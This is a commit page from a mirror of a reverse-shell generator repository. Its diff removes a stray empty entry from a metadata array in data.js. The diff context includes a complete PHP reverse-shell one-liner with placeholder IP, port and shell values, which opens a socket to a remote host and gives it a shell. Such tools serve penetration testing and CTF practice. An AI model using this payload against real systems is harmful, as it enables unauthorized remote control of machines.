mirror of
https://github.com/0dayCTF/reverse-shell-generator.git
synced 2024-12-18 10:56:10 +00:00
Update data.js
This commit is contained in:
parent
3d30d35360
commit
7c759e32ad
@ -174,7 +174,7 @@ const reverseShellCommands = withCommandType(
|
||||
{
|
||||
"name": "PHP exec",
|
||||
"command": "php -r '$sock=fsockopen(\"{ip}\",{port});exec(\"{shell} <&3 >&3 2>&3\");'",
|
||||
"meta": ["linux", , "mac"]
|
||||
"meta": ["linux", "mac"]
|
||||
},
|
||||
{
|
||||
"name": "PHP shell_exec",
|
||||
|
Loading…
Reference in New Issue
Block a user